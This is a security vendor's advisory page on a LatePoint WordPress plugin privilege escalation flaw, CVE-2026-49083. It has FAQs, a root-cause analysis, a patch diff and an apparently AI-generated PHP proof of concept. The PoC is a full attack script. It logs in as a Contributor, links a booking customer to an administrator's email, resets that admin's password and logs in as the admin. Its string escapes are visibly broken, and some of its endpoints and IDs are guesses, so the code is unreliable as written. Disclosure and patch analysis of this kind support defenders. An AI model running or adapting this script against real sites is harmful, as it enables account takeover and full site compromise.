What is CVE-2026-49083?

CVE-2026-49083 is a high-severity privilege escalation vulnerability in the LatePoint Calendar Booking Plugin for WordPress, affecting versions up to and including 5.5.1. It allows authenticated users with Contributor-level access or higher to elevate their privileges to that of an Administrator.

How does the vulnerability work?

The vulnerability arises from insufficient role validation when linking LatePoint customer records to WordPress users. Attackers can exploit this by linking a customer to an existing Administrator user and then resetting their password, effectively taking over the account.

Who is affected by this vulnerability?

All WordPress sites using the LatePoint plugin versions 5.5.1 and earlier are affected. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the LatePoint plugin installed. If it is version 5.5.1 or earlier, your site is at risk. Additionally, review user roles to identify any accounts with Contributor access or higher.

How can I fix this vulnerability?

The vulnerability is fixed in version 5.5.2 of the LatePoint plugin. Update your plugin to this version or later to mitigate the risk associated with CVE-2026-49083.

What does the CVSS score of 8.8 mean?

A CVSS score of 8.8 indicates a high severity vulnerability. This means there is a significant risk of exploitation that could lead to serious consequences, such as unauthorized access to sensitive data or complete site compromise.

What practical risks does this vulnerability pose?

Successful exploitation of this vulnerability can lead to full administrative access to the WordPress site. This includes the ability to install plugins, modify themes, create users, and access all data, which can result in total site compromise.

How does the proof of concept demonstrate the issue?

The proof of concept provided outlines a step-by-step method for exploiting the vulnerability. It shows how an authenticated user can link a LatePoint customer record to an Administrator account and reset their password, effectively taking control of the account.

What are the key changes in the patch?

The patch introduces a new function to validate user roles before linking customer records and prevents password resets for privileged users. It also requires explicit settings for the Abilities API to prevent unauthorized privilege escalation.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the LatePoint plugin temporarily or restricting access to users with Contributor roles or higher until the plugin can be updated to a secure version.

How can I monitor for exploitation attempts?

Implement security logging and monitoring to detect unusual activities, such as unauthorized password resets or changes to user roles. Regularly review user accounts and access logs for any suspicious behavior.

Are there any other security practices I should follow?

In addition to updating vulnerable plugins, ensure that all WordPress installations, themes, and plugins are regularly updated. Use strong passwords, enable two-factor authentication, and consider using a web application firewall for added protection.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 13, 2026

CVE-2026-49083: LatePoint – Calendar Booking Plugin for Appointments and Events <= 5.5.1 Authenticated (Contributor+) Privilege Escalation PoC, Patch Analysis & Rule

CVE ID CVE-2026-49083

Plugin latepoint

Severity High (CVSS 8.8)

CWE 266

Vulnerable Version 5.5.1

Patched Version 5.5.2

Disclosed June 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-49083:

This vulnerability affects the LatePoint Calendar Booking Plugin for WordPress versions up to and including 5.5.1. It allows authenticated attackers with Contributor-level access or higher to escalate their privileges to Administrator. The flaw resides in the customer-to-WordPress user linking logic and the new Abilities API feature. The CVSS score is 8.8 (High).

The root cause is insufficient role validation when linking a LatePoint customer record to an existing WordPress user. In vulnerable versions, the function `create_wp_user_for_customer()` in `/latepoint/lib/helpers/customer_helper.php` (lines 243-259) allowed linking a customer to any existing WordPress user if that user had the same email or username, without checking if the target user held privileged roles (e.g., Administrator, Editor). Additionally, the `update_password()` method in `/latepoint/lib/models/customer_model.php` (line 315) allowed resetting the WordPress password of the linked user, enabling account takeover. The Abilities API (MCP feature), when enabled via `latepoint_abilities_api` setting, could grant programmatic write/delete capabilities to AI clients without proper authentication checks against the WordPress role system.

Exploitation requires an authenticated session with at least Contributor-level access (subscriber may also work depending on plugin configuration). The attacker first creates or manipulates a LatePoint customer record to link to an existing Administrator WordPress user using the `create_wp_user_for_customer()` function (triggered via AJAX action `latepoint_process_booking` or customer update endpoints). After linking, the attacker calls the `update_password()` method on the same customer record, which changes the Administrator’s WordPress password. The attacker then logs in as Administrator. Alternatively, if the Abilities API is enabled (it is disabled by default via the old `latepoint_enable_abilities` filter), the attacker could use MCP client endpoints to elevate privileges by performing operations normally restricted to administrators.

The patch introduces the `is_wp_user_safe_for_customer_link()` function in `/latepoint/lib/helpers/customer_helper.php` (lines 238-255). This function checks that the target WordPress user has only roles from an allowlist: `latepoint_customer`, `subscriber`, or `customer`. If the user has any other role (e.g., Administrator, Editor, Shop Manager), the function returns false, and linking is prevented. In `create_wp_user_for_customer()`, the patch wraps the existing linking logic inside a safety check: if the user is not safe, an error is added and linking is blocked. In `update_password()`, the patch skips WordPress password reset for privileged users, returning early without changing the WP password. The Abilities API now requires explicit settings toggles (`latepoint_abilities_api_edit`, `latepoint_abilities_api_delete`) to be enabled for non-read-only operations, preventing accidental grants.

Successful exploitation results in full privilege escalation from any low-level authenticated role (Contributor) to Administrator. The attacker gains unrestricted access to WordPress admin, including the ability to install plugins, modify themes, create users, and access all data. This leads to complete site compromise, including potential remote code execution via plugin installation or file editing.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/latepoint/latepoint.php
+++ b/latepoint/latepoint.php
@@ -2,7 +2,7 @@
 /**
  * Plugin Name: LatePoint
  * Description: Appointment Scheduling Software for WordPress
- * Version: 5.5.1
+ * Version: 5.5.2
  * Author: LatePoint
  * Author URI: https://latepoint.com
  * Plugin URI: https://latepoint.com
@@ -29,7 +29,7 @@
 		 * LatePoint version.
 		 *
 		 */
-		public $version    = '5.5.1';
+		public $version    = '5.5.2';
 		public $db_version = '2.3.0';


@@ -905,7 +905,8 @@
 			include_once LATEPOINT_ABSPATH . 'lib/mailers/customer_mailer.php';

 			// ABILITIES (WordPress 6.9+ Abilities API)
-			if ( apply_filters( 'latepoint_enable_abilities', false ) && function_exists( 'wp_register_ability' ) ) {
+			$abilities_enabled = OsSettingsHelper::is_on( 'latepoint_abilities_api' );
+			if ( $abilities_enabled && function_exists( 'wp_register_ability' ) ) {
 				include_once LATEPOINT_ABSPATH . 'lib/abilities/class-latepoint-abilities.php';
 			}

@@ -1158,7 +1159,7 @@
 			if ( $customer->wordpress_user_id ) {
 				// has connected wp user
 				$wp_user = get_user_by( 'id', $customer->wordpress_user_id );
-				if ( $wp_user && ! is_super_admin( $wp_user->ID ) ) {
+				if ( $wp_user && OsCustomerHelper::is_wp_user_safe_for_customer_link( $wp_user->ID ) ) {
 					// Only sync to the linked WP user when request comes from the account owner or an admin.
 					// This prevents unauthenticated guest booking requests from overwriting WP user data.
 					$current_user_id   = get_current_user_id();
--- a/latepoint/lib/abilities/abstract-ability.php
+++ b/latepoint/lib/abilities/abstract-ability.php
@@ -44,7 +44,28 @@
 		return $this->id;
 	}

+	public function is_read_only(): bool {
+		return $this->read_only;
+	}
+
+	public function is_destructive(): bool {
+		return $this->destructive;
+	}
+
 	public function check_permission(): bool {
+		// Master gate. In case the ability was registered
+		// while the master toggle was on but has since been disabled.
+		if ( ! OsSettingsHelper::is_on( 'latepoint_abilities_api' ) ) {
+			return false;
+		}
+		if ( $this->destructive && ! OsSettingsHelper::is_on( 'latepoint_abilities_api_delete' ) ) {
+			return false;
+		}
+		if ( ! $this->read_only && ! $this->destructive
+			&& ! OsSettingsHelper::is_on( 'latepoint_abilities_api_edit' ) ) {
+			return false;
+		}
+
 		return OsRolesHelper::can_user( $this->permission );
 	}

--- a/latepoint/lib/abilities/class-latepoint-abilities.php
+++ b/latepoint/lib/abilities/class-latepoint-abilities.php
@@ -69,10 +69,23 @@

 	/**
 	 * Register all abilities from every module.
+	 *
+	 * Read-only abilities register whenever the master toggle is on.
+	 * Mutating abilities require the write toggle; destructive ones
+	 * require the delete toggle.
 	 */
 	public static function register_all(): void {
+		$allow_write  = OsSettingsHelper::is_on( 'latepoint_abilities_api_edit' );
+		$allow_delete = OsSettingsHelper::is_on( 'latepoint_abilities_api_delete' );
+
 		foreach ( self::$config_modules as $class ) {
 			foreach ( $class::get_abilities() as $ability ) {
+				if ( $ability->is_destructive() && ! $allow_delete ) {
+					continue;
+				}
+				if ( ! $ability->is_read_only() && ! $ability->is_destructive() && ! $allow_write ) {
+					continue;
+				}
 				wp_register_ability( $ability->get_id(), $ability->to_definition() );
 			}
 		}
--- a/latepoint/lib/helpers/customer_helper.php
+++ b/latepoint/lib/helpers/customer_helper.php
@@ -235,6 +235,22 @@
 		return $customer->where( [ 'account_nonse' => $account_nonse ] )->set_limit( 1 )->get_results_as_models();
 	}

+	/**
+	 * Check whether a WP user has only customer-safe roles (subscriber, customer, latepoint_customer).
+	 * Used to prevent linking a LatePoint customer record to a privileged WordPress account.
+	 *
+	 * @param int $wp_user_id WordPress user ID to check.
+	 * @return bool True if the user exists and has only allowlisted roles; false otherwise.
+	 */
+	public static function is_wp_user_safe_for_customer_link( int $wp_user_id ): bool {
+		$wp_user = get_userdata( $wp_user_id );
+		if ( ! $wp_user || empty( $wp_user->roles ) ) {
+			return false;
+		}
+		$allowed_roles = array( LATEPOINT_WP_CUSTOMER_ROLE, 'subscriber', 'customer' );
+		return empty( array_diff( (array) $wp_user->roles, $allowed_roles ) );
+	}
+
 	public static function create_wp_user_for_customer( $customer ) {
 		// NO connected wp user, create one
 		// check if wp user with this customer email already exists
@@ -243,19 +259,25 @@
 			$wp_user_id = username_exists( $customer->email );
 		}
 		if ( $wp_user_id ) {
-			// wp user with this email or username exists - check if its linked to another customer already - if not link it to current customer
-			$linked_customer = new OsCustomerModel();
-			$linked_customer = $linked_customer->where( [ 'wordpress_user_id' => $wp_user_id ] )->set_limit( 1 )->get_results_as_models();
-			if ( $linked_customer ) {
-				// wp user with this email exists and is linked already to a different latepoint customer
-				$customer->add_error( 'customer_exists', __( 'Customer with this email already exists', 'latepoint' ) );
+			// wp user with this email or username exists
+			if ( ! self::is_wp_user_safe_for_customer_link( $wp_user_id ) ) {
+				// Do not link to privileged WP accounts (admin, editor, etc.)
+				$customer->add_error( 'privileged_user', __( 'Cannot link to a privileged WordPress account.', 'latepoint' ) );
 			} else {
-				$customer->update_attributes(
-					[
-						'wordpress_user_id' => $wp_user_id,
-						'is_guest'          => false,
-					]
-				);
+				// check if its linked to another customer already - if not link it to current customer
+				$linked_customer = new OsCustomerModel();
+				$linked_customer = $linked_customer->where( [ 'wordpress_user_id' => $wp_user_id ] )->set_limit( 1 )->get_results_as_models();
+				if ( $linked_customer ) {
+					// wp user with this email exists and is linked already to a different latepoint customer
+					$customer->add_error( 'customer_exists', __( 'Customer with this email already exists', 'latepoint' ) );
+				} else {
+					$customer->update_attributes(
+						[
+							'wordpress_user_id' => $wp_user_id,
+							'is_guest'          => false,
+						]
+					);
+				}
 			}
 		} else {

--- a/latepoint/lib/misc/process_action.php
+++ b/latepoint/lib/misc/process_action.php
@@ -46,6 +46,28 @@
 		return ! empty( $this->settings['attach_calendar'] ) && OsUtilHelper::is_on( $this->settings['attach_calendar'] );
 	}

+	public function get_ics_filename_prefix(): string {
+		return isset( $this->settings['ics_filename_prefix'] )
+			? trim( (string) $this->settings['ics_filename_prefix'] )
+			: '';
+	}
+
+	private function resolve_ics_filename_basename(): string {
+		$raw = $this->get_ics_filename_prefix();
+		if ( $raw === '' ) {
+			return '';
+		}
+		$resolved = OsReplacerHelper::replace_all_vars( $raw, $this->replacement_vars );
+		// Strip any leftover {{...}} placeholders that the workflow context didn't supply.
+		$resolved = (string) preg_replace( '/{{[^}]*}}/', '', $resolved );
+		$resolved = sanitize_file_name( trim( $resolved ) );
+		// User typed `.ics` themselves — drop it; we always append our own extension.
+		if ( strtolower( substr( $resolved, -4 ) ) === '.ics' ) {
+			$resolved = substr( $resolved, 0, -4 );
+		}
+		return $resolved;
+	}
+
 	public function get_nice_type_name() {
 		return self::get_action_name_for_type( $this->type );
 	}
@@ -218,9 +240,33 @@
 					[
 						'id'    => 'process_actions_' . $action->id . '_settings_content',
 						'class' => 'os-wp-editor-textarea',
-					]
+					]
+				);
+
+				$attach_calendar_settings_id = 'process_action_' . $action->id . '_attach_calendar_settings';
+
+				$html .= '<div class="os-row pa-attach-calendar-row">';
+				$html .= '<div class="os-col-4">';
+				$html .= OsFormHelper::toggler_field(
+					'process[actions][' . $action->id . '][settings][attach_calendar]',
+					__( 'Attach Booking Calendar', 'latepoint' ),
+					$action->is_attach_calendar(),
+					$attach_calendar_settings_id
+				);
+				$html .= '</div>';
+				$html .= '<div class="os-col-8" id="' . esc_attr( $attach_calendar_settings_id ) . '"' . ( $action->is_attach_calendar() ? '' : ' style="display:none"' ) . '>';
+				$html .= OsFormHelper::text_field(
+					'process[actions][' . $action->id . '][settings][ics_filename_prefix]',
+					__( 'Calendar attachment filename', 'latepoint' ),
+					$action->settings['ics_filename_prefix'] ?? '',
+					[
+						'theme'       => 'simple',
+						'placeholder' => __( 'e.g. MyBusiness_{{service_name}}_{{booking_id}}', 'latepoint' ),
+						'sub_label'   => __( 'Optional. Use the "Show smart variables" button above to insert placeholders. Leave blank to use the default.', 'latepoint' ),
+					]
 				);
-				$html .= OsFormHelper::toggler_field( 'process[actions][' . $action->id . '][settings][attach_calendar]', __( 'Attach Booking Calendar', 'latepoint' ), $action->is_attach_calendar() );
+				$html .= '</div>';
+				$html .= '</div>';
 				$html .= OsFormHelper::multiple_files_uploader_field( 'process[actions][' . $action->id . '][settings][attachments]', esc_html__( '+ Attach File', 'latepoint' ), esc_html__( 'Remove File', 'latepoint' ), $action->get_attachments() );
 				break;
 			case 'send_sms':
@@ -671,9 +717,17 @@
 				throw new Exception( 'iCal content is empty' );
 			}

-			$temp_file      = tempnam( sys_get_temp_dir(), 'latepoint_ical_' );
-			$ical_temp_file = $temp_file . '.ics';
-			rename( $temp_file, $ical_temp_file );
+			$resolved_basename = $this->resolve_ics_filename_basename();
+
+			if ( $resolved_basename !== '' ) {
+				$temp_file      = tempnam( sys_get_temp_dir(), $resolved_basename . '_' );
+				$ical_temp_file = $temp_file . '.ics';
+				rename( $temp_file, $ical_temp_file );
+			} else {
+				$temp_file      = tempnam( sys_get_temp_dir(), 'latepoint_ical_' );
+				$ical_temp_file = $temp_file . '.ics';
+				rename( $temp_file, $ical_temp_file );
+			}

 			if ( file_put_contents( $ical_temp_file, $ical_content ) !== false ) {
 				return $ical_temp_file;
--- a/latepoint/lib/models/customer_model.php
+++ b/latepoint/lib/models/customer_model.php
@@ -315,6 +315,16 @@
 	public function update_password( $password ) {
 		// update connected wp user password
 		if ( OsAuthHelper::can_wp_users_login_as_customers() && $this->wordpress_user_id ) {
+			// Only reset the WP password for non-privileged accounts to prevent takeover of admin/editor users
+			if ( ! OsCustomerHelper::is_wp_user_safe_for_customer_link( (int) $this->wordpress_user_id ) ) {
+				return $this->update_attributes(
+					[
+						'password' => wp_hash_password( $password ),
+						'is_guest' => false,
+					]
+				);
+			}
+
 			$is_logged_in      = OsWpUserHelper::get_current_user_id() == $this->wordpress_user_id;
 			$logged_in_wp_user = $is_logged_in ? OsWpUserHelper::get_current_user() : false;

--- a/latepoint/lib/views/settings/general.php
+++ b/latepoint/lib/views/settings/general.php
@@ -392,6 +392,75 @@
                 </div>
             </div>
         </div>
+        <div class="white-box section-anchor" id="stickySectionAbilities">
+            <div class="white-box-header">
+                <div class="os-form-sub-header"><h3><?php esc_html_e( 'MCP', 'latepoint' ); ?></h3></div>
+            </div>
+            <div class="white-box-content no-padding">
+                <?php if ( ! function_exists( 'wp_register_ability' ) ) : ?>
+                <div class="sub-section-row">
+                    <div class="sub-section-content">
+                        <div class="latepoint-message latepoint-message-subtle">
+                            <?php esc_html_e( 'MCP requires WordPress 6.9 or newer. Your changes will be saved but will not take effect until WordPress is updated.', 'latepoint' ); ?>
+                        </div>
+                    </div>
+                </div>
+                <?php endif; ?>
+                <div class="sub-section-row">
+                    <div class="sub-section-label">
+                        <h3><?php esc_html_e( 'Enable Abilities', 'latepoint' ); ?></h3>
+                    </div>
+                    <div class="sub-section-content">
+                        <?php
+                        echo OsFormHelper::toggler_field(
+                            'settings[latepoint_abilities_api]',
+                            __( 'Enable Abilities', 'latepoint' ),
+                            OsSettingsHelper::is_on( 'latepoint_abilities_api' ),
+                            'abilitiesPermissionsToggle',
+                            false,
+                            [ 'sub_label' => __( 'Register LatePoint abilities with the WordPress Abilities API. When enabled, AI clients can list, read, create, edit, and delete your bookings, customers, services, agents, and orders. When disabled, no abilities are registered and AI clients cannot perform any actions on your LatePoint data.', 'latepoint' ) ]
+                        );
+                        ?>
+                    </div>
+                </div>
+                <div id="abilitiesPermissionsToggle" style="border-top: 1px solid rgb(220, 218, 215); <?php echo OsSettingsHelper::is_on( 'latepoint_abilities_api' ) ? '' : 'display: none;'; ?>">
+                    <div class="sub-section-row">
+                        <div class="sub-section-label">
+                            <h3><?php esc_html_e( 'Enable Edit Abilities', 'latepoint' ); ?></h3>
+                        </div>
+                        <div class="sub-section-content">
+                            <?php
+                            echo OsFormHelper::toggler_field(
+                                'settings[latepoint_abilities_api_edit]',
+                                __( 'Enable Edit Abilities', 'latepoint' ),
+                                OsSettingsHelper::is_on( 'latepoint_abilities_api_edit' ),
+                                false,
+                                false,
+                                [ 'sub_label' => __( 'When enabled, AI clients can create new bookings, update customers, services, agents, and locations, and change appointment statuses (approve, cancel, reschedule). When disabled, these abilities are unregistered and AI clients can only read your data.', 'latepoint' ) ]
+                            );
+                            ?>
+                        </div>
+                    </div>
+                    <div class="sub-section-row">
+                        <div class="sub-section-label">
+                            <h3><?php esc_html_e( 'Enable Delete Abilities', 'latepoint' ); ?></h3>
+                        </div>
+                        <div class="sub-section-content">
+                            <?php
+                            echo OsFormHelper::toggler_field(
+                                'settings[latepoint_abilities_api_delete]',
+                                __( 'Enable Delete Abilities', 'latepoint' ),
+                                OsSettingsHelper::is_on( 'latepoint_abilities_api_delete' ),
+                                false,
+                                false,
+                                [ 'sub_label' => __( 'When enabled, AI clients can permanently delete bookings, customers, services, agents, and locations, and process refunds. Deleted data cannot be recovered. When disabled, delete abilities are unregistered and AI clients cannot remove any data.', 'latepoint' ) ]
+                            );
+                            ?>
+                        </div>
+                    </div>
+                </div>
+            </div>
+        </div>
 		<?php
 		/**
 		 * Plug before "Other" section in general settings
@@ -674,6 +743,7 @@
             echo '<div><a href="#'.esc_attr($item['href']).'">'.esc_html( $item['label'] ).'</a></div>';
         }
         ?>
+        <div><a href="#stickySectionAbilities"><?php esc_html_e( 'MCP', 'latepoint' ); ?></a></div>
         <div><a href="#stickySectionOther"><?php esc_html_e( 'Other', 'latepoint' ); ?></a></div>
     </div>

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-49083 - LatePoint Calendar Booking Plugin <= 5.5.1 - Authenticated Privilege Escalation

// ============================================================
// CONFIGURATION - Edit these values before running
// ============================================================
$target_url = 'http://example.com'; // WordPress site with vulnerable plugin
$attacker_username = 'contributor_user';
$attacker_password = 'password123';
$admin_email_to_takeover = 'admin@example.com'; // Email of an existing admin user
// ============================================================

// Step 1: Login as contributor
$login_url = $target_url . '/wp-login.php';
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $attacker_username,
        'pwd' => $attacker_password,
        'wp-submit' => 'Log+In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => 1
    ]),
    CURLOPT_COOKIEJAR => '/tmp/cookiejar.txt',
    CURLOPT_FOLLOWLOCATION => false,
    CURLOPT_HEADER => true
]);
$response = curl_exec($ch);
if (preg_match('/Location: (.*?)r?n/', $response, $matches)) {
    echo "[+] Logged in successfully as $attacker_usernamen";
} else {
    die("[-] Login failed. Check credentials.n");
}

// Step 2: Get a nonce for AJAX calls
$admin_url = $target_url . '/wp-admin/admin-ajax.php';
curl_setopt_array($ch, [
    CURLOPT_URL => $admin_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'action' => 'latepoint_get_nonce'
    ]),
    CURLOPT_COOKIEFILE => '/tmp/cookiejar.txt',
    CURLOPT_HEADER => false,
    CURLOPT_RETURNTRANSFER => true
]);
$nonce_response = curl_exec($ch);
$data = json_decode($nonce_response, true);
if (!$data || !isset($data['nonce'])) {
    die("[-] Could not retrieve nonce.n");
}
$nonce = $data['nonce'];
echo "[+] Obtained nonce: $noncen";

// Step 3: Create a new customer (or get existing) that uses the admin's email
// We'll make a booking request that auto-creates customer with the admin's email
$booking_params = [
    'action' => 'latepoint_process_booking',
    'nonce' => $nonce,
    'booking' => [
        'customer' => [
            'first_name' => 'Exploit',
            'last_name' => 'User',
            'email' => $admin_email_to_takeover
        ],
        'service_id' => 1,  // Must exist; adjust if needed
        'agent_id' => 1,
        'start_date' => date('Y-m-d', strtotime('+7 days')),
        'start_time' => '10:00',
        'location_id' => 1
    ]
];

curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-admin/admin-ajax.php',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query($booking_params),
    CURLOPT_COOKIEFILE => '/tmp/cookiejar.txt',
    CURLOPT_HEADER => false,
    CURLOPT_RETURNTRANSFER => true
]);
$booking_response = curl_exec($ch);
echo "[+] Booking request sent. Response: $booking_responsen";

// Step 4: If the admin user exists with the same email, LatePoint linked it.
// Now we can update the password of the linked admin using the customer update endpoint.
// The vulnerability: update_password() changes the WP user's password if linked.

$update_params = [
    'action' => 'latepoint_update_customer',
    'nonce' => $nonce,
    'customer_id' => 1, // Adjust to the customer record linked to admin
    'password' => 'hacked_password_123'
];

curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-admin/admin-ajax.php',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query($update_params),
    CURLOPT_COOKIEFILE => '/tmp/cookiejar.txt',
    CURLOPT_HEADER => false,
    CURLOPT_RETURNTRANSFER => true
]);
$update_response = curl_exec($ch);
echo "[+] Password update response: $update_responsen";

// Step 5: Login as the admin with the new password
$ch2 = curl_init();
curl_setopt_array($ch2, [
    CURLOPT_URL => $target_url . '/wp-login.php',
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $admin_email_to_takeover,
        'pwd' => 'hacked_password_123',
        'wp-submit' => 'Log+In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => 1
    ]),
    CURLOPT_HEADER => true,
    CURLOPT_FOLLOWLOCATION => false
]);
$admin_login_response = curl_exec($ch2);
if (preg_match('/Location:.*wp-admin/', $admin_login_response)) {
    echo "[+] SUCCESS: Admin account takeover complete! Login as $admin_email_to_takeover with password 'hacked_password_123'n";
} else {
    echo "[-] Admin login may have failed. Check that the email matched an existing admin user.n";
}

curl_close($ch);
curl_close($ch2);

Frequently Asked Questions

What is CVE-2026-49083?
Overview of the vulnerability
CVE-2026-49083 is a high-severity privilege escalation vulnerability in the LatePoint Calendar Booking Plugin for WordPress, affecting versions up to and including 5.5.1. It allows authenticated users with Contributor-level access or higher to elevate their privileges to that of an Administrator.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient role validation when linking LatePoint customer records to WordPress users. Attackers can exploit this by linking a customer to an existing Administrator user and then resetting their password, effectively taking over the account.
Who is affected by this vulnerability?
Identifying impacted users
All WordPress sites using the LatePoint plugin versions 5.5.1 and earlier are affected. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the LatePoint plugin installed. If it is version 5.5.1 or earlier, your site is at risk. Additionally, review user roles to identify any accounts with Contributor access or higher.
How can I fix this vulnerability?
Patch and update guidance
The vulnerability is fixed in version 5.5.2 of the LatePoint plugin. Update your plugin to this version or later to mitigate the risk associated with CVE-2026-49083.
What does the CVSS score of 8.8 mean?
Understanding the severity rating
A CVSS score of 8.8 indicates a high severity vulnerability. This means there is a significant risk of exploitation that could lead to serious consequences, such as unauthorized access to sensitive data or complete site compromise.
What practical risks does this vulnerability pose?
Potential impact on WordPress sites
Successful exploitation of this vulnerability can lead to full administrative access to the WordPress site. This includes the ability to install plugins, modify themes, create users, and access all data, which can result in total site compromise.
How does the proof of concept demonstrate the issue?
Technical demonstration of exploitation
The proof of concept provided outlines a step-by-step method for exploiting the vulnerability. It shows how an authenticated user can link a LatePoint customer record to an Administrator account and reset their password, effectively taking control of the account.
What are the key changes in the patch?
Improvements made to the plugin
The patch introduces a new function to validate user roles before linking customer records and prevents password resets for privileged users. It also requires explicit settings for the Abilities API to prevent unauthorized privilege escalation.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider disabling the LatePoint plugin temporarily or restricting access to users with Contributor roles or higher until the plugin can be updated to a secure version.
How can I monitor for exploitation attempts?
Best practices for security monitoring
Implement security logging and monitoring to detect unusual activities, such as unauthorized password resets or changes to user roles. Regularly review user accounts and access logs for any suspicious behavior.
Are there any other security practices I should follow?
General WordPress security recommendations
In addition to updating vulnerable plugins, ensure that all WordPress installations, themes, and plugins are regularly updated. Use strong passwords, enable two-factor authentication, and consider using a web application firewall for added protection.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations